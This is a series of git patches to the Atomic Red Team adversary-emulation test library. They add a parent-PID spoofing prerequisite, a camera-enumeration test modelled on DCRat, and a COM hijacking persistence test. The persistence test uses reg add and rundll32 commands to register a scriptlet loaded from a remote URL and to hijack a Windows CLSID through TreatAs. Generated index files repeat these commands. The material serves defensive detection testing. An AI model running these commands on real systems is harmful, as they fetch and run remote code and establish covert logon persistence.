From a43555eab098ae822c710e01ace273a6b8ce6f3b Mon Sep 17 00:00:00 2001 From: TaintedHorizon Date: Thu, 28 Jul 2022 14:28:41 -0700 Subject: [PATCH 01/22] update dependencies (#2053) Test does not currently execute remotely because ppid-spoof.ps1 does not get copied remotely. --- atomics/T1134.004/T1134.004.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/atomics/T1134.004/T1134.004.yaml b/atomics/T1134.004/T1134.004.yaml index 57bf810f..e05ab373 100644 --- a/atomics/T1134.004/T1134.004.yaml +++ b/atomics/T1134.004/T1134.004.yaml @@ -41,6 +41,13 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + - description: | + PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + prereq_command: | + if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 executor: command: | . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 From b13fb3c35e75c6e8cfbf6e4d72da22fe696ba9b1 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 28 Jul 2022 21:29:24 +0000 Subject: [PATCH 02/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 20 ++++++++++++++++++++ atomics/T1134.004/T1134.004.md | 10 ++++++++++ 2 files changed, 30 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 186b390a..ef16519d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -15727,6 +15727,16 @@ defense-evasion: get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + + ' + prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) + {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 executor: command: | . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 @@ -34335,6 +34345,16 @@ privilege-escalation: get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" + - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 + + ' + prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) + {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 executor: command: | . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 8702ca75..745d7f29 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -75,6 +75,16 @@ if (Test-Path #{dll_path}) {exit 0} else {exit 1} New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" ``` +##### Description: PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 +##### Check Prereq Commands: +```powershell +if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1 +``` From b05d6193da7e2606d88f98598ea9950e74c11ef1 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Fri, 29 Jul 2022 17:02:55 +0200 Subject: [PATCH 03/22] Windows camera info gathering (#2056) * Create T1592.001.md * Create T1592.001.yml --- atomics/T1592.001/T1592.001.md | 26 ++++++++++++++++++++++++++ atomics/T1592.001/T1592.001.yml | 15 +++++++++++++++ 2 files changed, 41 insertions(+) create mode 100644 atomics/T1592.001/T1592.001.md create mode 100644 atomics/T1592.001/T1592.001.yml diff --git a/atomics/T1592.001/T1592.001.md b/atomics/T1592.001/T1592.001.md new file mode 100644 index 00000000..666f2943 --- /dev/null +++ b/atomics/T1592.001/T1592.001.md @@ -0,0 +1,26 @@ +# T1592.001 - Gather Victim Host Information: Hardware +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1592/001/) +
Adversaries may use powershell script to gather information about the system, configuration, and even mounted hardware on the target host. + + Dark Crystal Rat use several technique to gather hardware information of the compromised host like gathering the microphone, CPU, GPU, camera and many as part of its data collection and backdoor capabilities. +
+ +## Atomic Tests + +- [Atomic Test #1 - Query Registry](#atomic-test-1---Enumerate PlugNPlay Camera) + + +
+ +## Atomic Test #1 - Query Registry +Enumerate PlugNPlay Camera. +Upon successful execution, powershell.exe will perform queries to plugnplay camera device mounted on the host. +References: + +https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor + +https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat + +**Supported Platforms:** Windows + +**auto_generated_guid:** 08a04133-3f2a-4eb0-bdd8-2aa513d2fb60 diff --git a/atomics/T1592.001/T1592.001.yml b/atomics/T1592.001/T1592.001.yml new file mode 100644 index 00000000..dcd9be43 --- /dev/null +++ b/atomics/T1592.001/T1592.001.yml @@ -0,0 +1,15 @@ +attack_technique: T1592.001 +display_name: 'Gather Victim Host Information: Hardware' +atomic_tests: +- name: Enumerate PlugNPlay Camera + auto_generated_guid: d430bf85-b656-40e7-b238-42db01df0183 + description: | + Enumerate PlugNPlay Camera using powershell commandlet. this technique was seen in dcrat malware backdoor capabilities where it enumerate the camera info mounted on the compromised host. + reference: https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor + supported_platforms: + - windows + executor: + command: | + Get-CimInstance -Query "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" + name: powershell + elevation_required: true From c343036e0c5a6e761b4f166b71b93107a2632194 Mon Sep 17 00:00:00 2001 From: Jacques Decarie Date: Fri, 29 Jul 2022 11:06:38 -0400 Subject: [PATCH 04/22] T1546.015 COM hijacking via TreatAs (#2050) * adding TreatAs * removing sct_path * fixing executor name * fixing references * fixing references Co-authored-by: Carrie Roberts --- atomics/T1546.015/T1546.015.yaml | 38 +++++++++++++++++++++++++++++++ atomics/T1546.015/src/TreatAs.sct | 22 ++++++++++++++++++ 2 files changed, 60 insertions(+) create mode 100644 atomics/T1546.015/src/TreatAs.sct diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index de990686..f962aa48 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -95,3 +95,41 @@ atomic_tests: cleanup_command: |- Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell +- name: COM hijacking via TreatAs + description: |- + This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. + Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The + test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + + References: + + https://youtu.be/3gz1QmiMhss?t=1251 + + https://github.com/enigma0x3/windows-operating-system-archaeology + + supported_platforms: + - windows + executor: + command: |- + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f + + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + + rundll32.exe -sta "AtomicTest" + + cleanup_command: |- + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + name: powershell diff --git a/atomics/T1546.015/src/TreatAs.sct b/atomics/T1546.015/src/TreatAs.sct new file mode 100644 index 00000000..c5826f02 --- /dev/null +++ b/atomics/T1546.015/src/TreatAs.sct @@ -0,0 +1,22 @@ + + + + + + + + + \ No newline at end of file From 0b80c61208bb8716cd57a16f1a573518dec775ed Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Fri, 29 Jul 2022 15:07:10 +0000 Subject: [PATCH 05/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1546.015/T1546.015.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1546.015/T1546.015.yaml b/atomics/T1546.015/T1546.015.yaml index f962aa48..d938c90c 100644 --- a/atomics/T1546.015/T1546.015.yaml +++ b/atomics/T1546.015/T1546.015.yaml @@ -96,6 +96,7 @@ atomic_tests: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell - name: COM hijacking via TreatAs + auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 description: |- This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7c51f4fd..448eadfb 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1097,3 +1097,4 @@ df81db1b-066c-4802-9bc8-b6d030c3ba8e ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 a27418de-bdce-4ebd-b655-38f11142bf0c 1e40bb1d-195e-401e-a86b-c192f55e005c +33eacead-f117-4863-8eb0-5c6304fbfaa9 From 8d57cd72e58746382cafbde8e3c72b7d351d1221 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 29 Jul 2022 15:07:16 +0000 Subject: [PATCH 06/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 76 +++++++++++++++++++ atomics/T1546.015/T1546.015.md | 59 ++++++++++++++ 6 files changed, 143 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5b5e00cc..060e2d4e 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -530,6 +530,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt @@ -755,6 +756,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c6268bef..ec7db3cd 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -394,6 +394,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt @@ -551,6 +552,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell +persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index fdabd1a3..abe3650f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -841,6 +841,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] - T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1281,6 +1282,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a57d06c9..32fec16c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -630,6 +630,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] - T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -935,6 +936,7 @@ - Atomic Test #1: COM Hijacking - InprocServer32 [windows] - Atomic Test #2: Powershell Execute COM Object [windows] - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows] + - Atomic Test #4: COM hijacking via TreatAs [windows] - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ef16519d..d9b81102 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -36918,6 +36918,44 @@ privilege-escalation: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: COM hijacking via TreatAs + auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 + description: |- + This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. + Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The + test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + + References: + + https://youtu.be/3gz1QmiMhss?t=1251 + + https://github.com/enigma0x3/windows-operating-system-archaeology + supported_platforms: + - windows + executor: + command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve + /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T + REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\" + /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe + -sta \"AtomicTest\" " + cleanup_command: |- + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + name: powershell T1574.009: technique: x_mitre_platforms: @@ -58887,6 +58925,44 @@ persistence: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: COM hijacking via TreatAs + auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 + description: |- + This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. + Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The + test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + + References: + + https://youtu.be/3gz1QmiMhss?t=1251 + + https://github.com/enigma0x3/windows-operating-system-archaeology + supported_platforms: + - windows + executor: + command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve + /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T + REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add + \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\" + /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\" + /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\" + /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\" + /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\" + /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe + -sta \"AtomicTest\" " + cleanup_command: |- + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f + reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f + name: powershell T1137.004: technique: x_mitre_platforms: diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md index ce6a555d..7eb9d858 100644 --- a/atomics/T1546.015/T1546.015.md +++ b/atomics/T1546.015/T1546.015.md @@ -12,6 +12,8 @@ Adversaries can use the COM system to insert malicious code that can be executed - [Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)](#atomic-test-3---com-hijacking-with-rundll32-local-server-switch) 